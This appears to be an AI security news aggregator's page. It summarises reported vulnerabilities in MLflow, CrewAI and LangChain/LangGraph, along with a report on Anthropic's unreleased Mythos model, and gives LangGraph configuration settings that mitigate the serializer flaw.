The security intelligence platform for AI teams
AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.
Anthropic's Leaked "Mythos" Model Raises Cybersecurity Concerns: An accidental configuration leak revealed Anthropic's unreleased Mythos model, which has advanced reasoning and coding abilities including recursive self-fixing (autonomously finding and patching its own bugs). The model's improved capability to find and exploit software vulnerabilities could enable more sophisticated cyberattacks, prompting Anthropic to plan a cautious rollout targeting enterprise security teams first.
Critical Command Injection in MLflow Model Deployment: MLflow has a command injection vulnerability (where an attacker inserts malicious commands into input that gets executed) in its model serving code when deploying models with `env_manager=LOCAL`. The flaw reads dependency information from `python_env.yaml` and executes it in a shell without validation, allowing arbitrary command execution on deployment systems. (CVE-2025-15379, critical severity)
Multiple High-Severity Vulnerabilities Found in CrewAI: CrewAI has several serious security flaws including two that enable RCE (remote code execution, where attackers run commands on systems they don't control) when Docker containerization fails and the system falls back to less secure sandbox settings. Additional vulnerabilities allow arbitrary file reading and SSRF (server-side request forgery, tricking a server into making unwanted requests) through improper validation in RAG search tools. (CVE-2026-2287, CVE-2026-2275, CVE-2026-2285, CVE-2026-2286)
LangChain Path Traversal Adds to AI Pipeline Security Woes: LangChain and LangGraph have critical flaws allowing attackers to steal sensitive data like API keys through improper input handling, including a new path traversal bug (CVE-2026-34070, CVSS 7.5) that lets attackers read arbitrary files. Maintainers have released fixes that need immediate application.
Fix: LangGraph provides several mitigation options: (1) Set the environment variable `LANGGRAPH_STRICT_MSGPACK` to a truthy value (`1`, `true`, or `yes`) to enable strict mode, which blocks unsafe object types by default. (2) Configure `allowed_msgpack_modules` in your serializer or checkpointer to `None` (strict mode, only safe types allowed), a custom allowlist of specific modules and classes like `[(module, class_name), ...]`, or `True` (the default, allows all types but logs warnings). (3) When compiling a `StateGraph` with `LANGGRAPH_STRICT_MSGPACK` enabled, LangGraph automatically derives an allowlist from the graph's schemas and channels and applies it to the checkpointer.
GitHub Advisory Database